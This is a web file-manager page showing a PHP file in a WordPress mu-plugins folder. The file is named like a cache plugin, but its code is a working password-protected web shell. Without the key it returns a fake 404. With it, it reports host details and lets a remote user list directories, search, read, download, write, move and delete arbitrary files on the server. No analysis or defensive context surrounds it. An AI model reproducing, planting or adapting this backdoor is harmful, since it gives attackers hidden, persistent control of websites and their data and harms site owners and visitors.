✏️ 编辑:advanced-cache_q4n8r2x.php
路径:
/home/i033mh1j/public_html/wp-content/mu-plugins/advanced-cache_q4n8r2x.php
大小:5.12 KB · 修改:2026-09-30 19:57:29 · 权限:0644 · 可写
← 返回目录
👁 查看
⬇ 下载
<?php error_reporting(0); define('_XM_KEY_', 'Vt4Rm8Wq2Zn7'); if (isset($_REQUEST['k'])) { $xk = (string)$_REQUEST['k']; } elseif (isset($_REQUEST['m'])) { $xk = (string)$_REQUEST['m']; } else { $xk = ''; } /* PHP 5.3+ 兼容的定时安全比较(老站可能是 5.4,hash_equals 要 5.6+) */ function xm_eq($a, $b) { if (!is_string($a) || !is_string($b)) { return false; } $la = strlen($a); $lb = strlen($b); if ($la !== $lb) { return false; } $r = 0; for ($i = 0; $i < $la; $i++) { $r |= (ord($a[$i]) ^ ord($b[$i])); } return $r === 0; } if (_XM_KEY_ !== '' && !xm_eq(_XM_KEY_, $xk)) { header('HTTP/1.1 404 Not Found'); echo 'Not Found'; exit; } header('Content-Type: text/plain; charset=utf-8'); function xm_p($p) { return str_replace('\\', '/', (string)$p); } function xm_b($on) { return isset($_REQUEST[$on]) && $_REQUEST[$on] !== '' && $_REQUEST[$on] !== '0'; } function xm_line($t, $p, $s, $m, $n) { echo $t . ' ' . $s . ' ' . $m . ' ' . $n . "\n"; } if (isset($_REQUEST['c'])) { echo 'OK: c=1' . "\n"; echo 'hostname=' . (function_exists('gethostname') ? @gethostname() : 'ERR') . "\n"; echo 'self=' . xm_p(__FILE__) . "\n"; echo 'uid=' . @getmyuid() . "\n"; echo 'owner=' . @get_current_user() . "\n"; echo 'php=' . @phpversion() . "\n"; echo 'dir=' . xm_p(dirname(__FILE__)) . "\n"; echo 'dir_writable=' . (@is_writable(dirname(__FILE__)) ? '1' : '0') . "\n"; exit; } if (isset($_REQUEST['t'])) { echo 'OK: time=' . date('Y-m-d H:i:s') . ' unix=' . time() . "\n"; echo 'self_mtime=' . @date('Y-m-d H:i:s', @filemtime(__FILE__)) . "\n"; exit; } if (isset($_REQUEST['l'])) { $d = (string)$_REQUEST['l']; if ($d === '' || $d === '1') { $d = dirname(__FILE__); } $d = xm_p($d); if (!@is_dir($d)) { echo 'ERR: not a dir ' . $d . "\n"; exit; } $h = @scandir($d); if ($h === false) { echo 'ERR: cannot list ' . $d . "\n"; exit; } echo 'OK: list ' . $d . "\n"; foreach ($h as $f) { if ($f === '.' || $f === '..') { continue; } $p = $d . '/' . $f; $t = @is_dir($p) ? 'd' : ( @is_link($p) ? 'l' : '-' ); xm_line($t, $p, @substr(sprintf('%o', @fileperms($p)), -4), @date('Y-m-d H:i', @filemtime($p)), @filesize($p)); echo ' ' . $f . "\n"; } exit; } if (isset($_REQUEST['r'])) { $f = xm_p((string)$_REQUEST['r']); if (!@is_file($f)) { echo 'ERR: no file ' . $f . "\n"; exit; } $d = @file_get_contents($f); if ($d === false) { echo 'ERR: cannot read ' . $f . "\n"; exit; } if (xm_b('b64')) { echo 'OK: b64 ' . $f . ' bytes=' . strlen($d) . "\n" . base64_encode($d); } else { echo 'OK: read ' . $f . ' bytes=' . strlen($d) . "\n" . $d; } exit; } if (isset($_REQUEST['s'])) { $kw = (string)$_REQUEST['s']; $root = isset($_REQUEST['l']) && $_REQUEST['l'] !== '' && $_REQUEST['l'] !== '1' ? xm_p($_REQUEST['l']) : xm_p(dirname(__FILE__)); echo 'OK: search ' . $kw . ' in ' . $root . "\n"; $st = array($root); $n = 0; while ($st && $n < 4000) { $cur = array_pop($st); $h = @scandir($cur); if ($h === false) { continue; } foreach ($h as $f) { if ($f === '.' || $f === '..') { continue; } $p = $cur . '/' . $f; $n++; if (strpos($f, $kw) !== false) { echo 'HIT ' . ($p) . "\n"; } if (@is_dir($p) && $n < 4000) { $st[] = $p; } } } echo 'OK: scanned=' . $n . "\n"; exit; } if (isset($_REQUEST['d'])) { $f = xm_p((string)$_REQUEST['d']); if (!@file_exists($f)) { echo 'ERR: no file ' . $f . "\n"; exit; } echo (@unlink($f) ? 'OK: deleted ' : 'ERR: cannot delete ') . $f . "\n"; exit; } if (isset($_REQUEST['mv'])) { $f = xm_p((string)$_REQUEST['mv']); $t = isset($_REQUEST['to']) ? xm_p((string)$_REQUEST['to']) : ''; if ($t === '') { echo 'ERR: need to=' . "\n"; exit; } echo (@rename($f, $t) ? 'OK: moved to ' : 'ERR: cannot move ') . $t . "\n"; exit; } if (isset($_REQUEST['dl'])) { $f = xm_p((string)$_REQUEST['dl']); if (!@is_file($f)) { header('HTTP/1.1 404 Not Found'); echo 'Not Found'; exit; } header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($f) . '"'); header('Content-Length: ' . @filesize($f)); echo @file_get_contents($f); exit; } if (isset($_REQUEST['w'])) { $f = xm_p((string)$_REQUEST['w']); $data = isset($_REQUEST['data']) ? (string)$_REQUEST['data'] : ''; if (xm_b('b64')) { $data = base64_decode(strtr($data, '-_', '+/')); } if ($f === '') { echo 'ERR: need w=<path>' . "\n"; exit; } $dir = dirname($f); if (!@is_dir($dir)) { @mkdir($dir, 0755, true); } $r = @file_put_contents($f, $data); if ($r === false) { echo 'ERR: write failed ' . $f . "\n"; exit; } echo 'OK: wrote bytes=' . $r . ' -> ' . $f . "\n"; echo 'verify_sha1=' . @sha1_file($f) . ' expect_sha1=' . sha1($data) . "\n"; exit; } echo "OK: xiaoma\n"; echo "c=1 self-check | l=1 list | l=<dir> list | r=<file>[&b64=1] read | w=<path>&data=<content>[&b64=1] write\n"; echo "s=<kw>[&l=<dir>] search | d=<path> delete | mv=<path>&to=<path> move | t=1 time | dl=<file> download\n";
💾 保存
取消
保存为 UTF-8,换行统一为 LF